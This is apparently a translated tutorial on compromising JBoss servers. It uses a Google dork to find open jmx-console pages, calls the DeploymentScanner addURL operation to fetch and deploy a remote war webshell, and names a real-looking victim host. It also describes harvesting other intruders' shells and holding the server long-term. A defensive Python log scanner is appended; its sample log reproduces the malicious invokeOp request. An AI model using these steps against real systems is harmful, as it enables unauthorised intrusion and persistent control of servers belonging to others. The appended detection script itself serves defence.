JBoss is a large application platform that ordinary users rarely come into contact with, and the harder something is to reach, the more advanced it seems. To borrow the words of Beijing bus driver Li Suli, "brute force alone produces only mediocre work; it takes real effort to produce excellent work". The same is true in security: although the JBoss platform is difficult to master, once you find JBoss's Achilles heel, penetration becomes just as easy. This article describes how to obtain a Webshell through one JBoss vulnerability; since this is research, it goes only this far.
1. Search using the vulnerability's fingerprint
Among JBoss exploits, a notable fingerprint is the string "8080/jmx-console/". There are other fingerprints, but this one is convenient for searching with Google. The Google search address used here is www.google.com.hk; Baidu's search results are not as good as Google's. Entering inurl:"8080/jmx-console/" in the Google search box returns a large number of results.
2. Access the site and perform the vulnerability test
Check the search results one by one to see whether each site can be accessed normally. Because search engine results are not always current, some sites appear in the results but can no longer be reached for various reasons; discard any site that cannot be accessed. Among the results, we find that <http://oa.tsingtaobeer-sales.com:8080/jmx-console/> can be accessed normally. Then search the page for "jboss.deployment" and find "flavor=URL,type=DeploymentScanner"; click the link to see whether it opens normally, as shown in Figure 1.
Figure 1 Testing the JBoss page
3. Add the address of the Webshell war file
The JSP shell is packed into a war file, which is then uploaded to a web site accessible from the Internet; in this case the real address of the war file is "http://www.cam*.com.hk/forum/forumdata/cache/war.war". On the currently open page, "http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL", look for the "void addURL()" function, copy "http://www.cam***.com.hk/forum/forumdata/cache/cmd.war" into "ParamValue" as shown in Figure 2, and then click "Invoke". The file http://www.cam*.com.hk/forum/forumdata/cache/war.war is downloaded to the local server and deployed. After successful deployment a confirmation prompt is shown, as shown in Figure 3.
Figure 2 Using the addURL function to download and deploy the war file
Figure 3 The operation executed successfully
4. Apply the change so the setting takes effect
Return to the main interface, as shown in Figure 4. The newly added war address appears under Resources; click "Apply Changes" to make the setting take effect.
Figure 4 Applying the change so the setting takes effect
5. Replenish the "arsenal of weapons"
Looking at Resources, the list contains the addresses of the deployed war files. If after the previous steps Resources contains only your own address, then congratulations: you are the first to reach this server. Once you have the server, privileges can be escalated and the server hardened, after which it can be "maintained" and used by you over the long term. In this case, copy the values under Resources into Notepad and tidy them up; this server turned out to have 26 war files. The war addresses in the list are as follows:
To fetch these addresses, the simple way is to copy them and paste them into FlashGet to download. Some of these war files cannot be downloaded, but by collecting and analysing the war files that were downloaded, 4 usable war files were obtained. During testing the author ran into problems with the war file application step and went back and forth several times without success before obtaining the war files; once sorted, these make a well-stocked arsenal with plenty of ammunition!
6. Get the Webshell
Enter the address "http://oa.tsingtaobeer-sales.com:8080/war" in the browser to test whether the Webshell is accessible, as shown in Figure 5; it is the familiar JSP Webshell page. Particular attention is needed during deployment: because the war file name and the site path may differ, the access address may deviate somewhat, so more testing is required. Some shells are directly accessible while others require the extra war package name in the path. For further details on obtaining a Webshell on JBoss, interested readers can visit www.antian365.com to view the video.
Figure 5 Getting the Webshell
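As an added defender-side example (not code from the original article), the following Python script scans web-server access-log lines for the jmx-console activity the walkthrough above relies on: reaching /jmx-console/ at all, inspecting the DeploymentScanner MBean, and an invokeOp against it that carries a remote war URL. The log lines, IP addresses and URLs are constructed samples; the common log format and the HtmlAdaptor query parameter names are assumptions, not taken from the article.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/Tomcat common log format; not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:01:02 +0800] "GET /jmx-console/ HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2012:10:01:20 +0800] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL HTTP/1.1" 200 9031
10.0.0.5 - - [12/Mar/2012:10:02:05 +0800] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1200
10.0.0.5 - - [12/Mar/2012:10:02:40 +0800] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=3&arg0=http%3A%2F%2Fexample.invalid%2Fcache%2Fwar.war HTTP/1.1" 200 800
192.0.2.9 - - [12/Mar/2012:10:03:00 +0800] "GET /index.html HTTP/1.1" 200 100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(method, target):
    """Return (severity, reason, detail) for one request, or None if it is not jmx-console traffic."""
    parts = urlsplit(target)
    if not parts.path.startswith("/jmx-console/"):
        return None
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs already percent-decodes
    mbean = params.get("name", "")
    if params.get("action") == "invokeOp" and "DeploymentScanner" in mbean:
        # An operation on the URL DeploymentScanner (e.g. addURL) makes the server fetch and deploy a remote war.
        return ("HIGH", "remote war deployment via DeploymentScanner", params.get("arg0", ""))
    if method == "POST" and parts.path.endswith("/HtmlAdaptor"):
        # The HTML adaptor also submits invocations as form POSTs, whose bodies the access log does not record.
        return ("MEDIUM", "MBean operation submitted to HtmlAdaptor (body not logged)", "")
    if "DeploymentScanner" in mbean:
        return ("MEDIUM", "deployment scanner MBean inspected", mbean)
    return ("LOW", "jmx-console reachable; it should require authentication or be removed", parts.path)

def scan_log(text):
    """Parse access-log text and return (ip, status, severity, reason, detail) per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m["method"], m["target"])
        if hit:
            findings.append((m["ip"], m["status"], *hit))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A single source address walking from LOW through MEDIUM to HIGH within minutes, as in the sample, is the sequence to alert on; the durable fix is to require authentication on /jmx-console/ or remove it from production servers.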